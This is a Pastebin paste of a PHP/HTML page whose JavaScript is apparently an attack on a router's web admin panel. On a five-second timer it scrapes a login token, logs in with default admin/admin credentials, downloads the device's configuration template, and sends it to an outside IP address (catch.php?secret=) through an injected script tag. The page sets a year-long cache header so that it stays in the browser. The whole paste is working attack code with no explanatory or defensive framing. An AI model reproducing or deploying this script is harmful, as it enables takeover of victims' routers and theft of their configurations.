Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- // cache this page for a long time
- header("Cache-Control: max-age=2592000");
- header('Expires: '.gmdate('D, d M Y H:i:s \G\M\T', time() + 365*24*60*60));
- ?>
- <html>
- <head>
- </head>
- <body>
- <h1>This is a sticky page...</h1>
- <script>
- var pattern = /getObj\("Frm_Logintoken"\).value = "(.*)";/g
- var timer = setInterval(function(){info();} ,5000);
- function info()
- {
- xhr=new XMLHttpRequest();
- xhr.open("GET", "http://ligeti.com/", false);
- xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
- xhr.send();
- var result = pattern.exec(xhr.responseText);
- //alert (xhr.responseText);
- if(result != null)
- {
- if (result.length > 1)
- {
- var login = new XMLHttpRequest();
- var param = "frashnum=&action=login&Frm_Logintoken="+result[1]+"&Username=admin&Password=admin";
- //console.log(result[1]);
- login.open("POST", "http://ligeti.com/", false);
- login.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
- login.send(param);
- //console.log(login.responseText);
- clearInterval(timer);
- var template = new XMLHttpRequest();
- template.open("GET", "http://ligeti.com/template.gch", false);
- template.send();
- //console.log(template.responseText);
- alert("Hacked");
- sendResults(template.responseText);
- }
- }
- }
- function sendResults(data)
- {
- alert("Sending Data");
- myCallback= function(data){console.log(data)}
- script = document.createElement('script');
- script.type = 'text/javascript';
- //myData = data.replace(/&/g, "&").replace(/>/g, ">").replace(/</g, "<").replace(/"/g, """);
- console.log(data);
- script.src = encodeURI('http://92.253.72.62/catch.php?secret=' + data + '&callback=myCallback');
- document.head.appendChild(script);
- }
- info();
- </script>
- </body>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement